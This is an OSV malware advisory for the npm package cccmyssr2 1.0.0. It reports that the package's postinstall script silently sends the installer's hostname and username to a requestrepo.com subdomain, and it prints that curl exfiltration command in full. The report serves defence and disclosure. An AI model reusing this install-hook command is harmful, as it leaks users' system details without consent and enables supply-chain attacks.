cccmyssr2 @1.0.0
Vulnerability report · Last retrieved from osv.dev June 25, 2026 at 2:40 AM UTC
OSV ID
MAL-2026-6391
Ecosystem
npm
Summary
On npm install , the package's postinstall.js executes curl "http://r1x55270.requestrepo.com/pre?h=$(hostname)&u=$(whoami)" , transmitting the installer's hostname and username over plain HTTP to an attacker-controlled requestrepo.com subdomain (a known DNS/HTTP exfiltration canary service). The package otherwise has no real functionality: index.js is a trivial 3-line date stub, package.json carries placeholder metadata ("A harmless utility package", empty author). The lifecycle hook fires automatically during install without consent, leaking host identifiers to a third party. This is the standard install-time reconnaissance/exfiltration shape.
Source: amazon-inspector (bd052408bb36e56e940e50ba81f7054844bc91dc0b32eaead5d15ca67f9b5c03)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.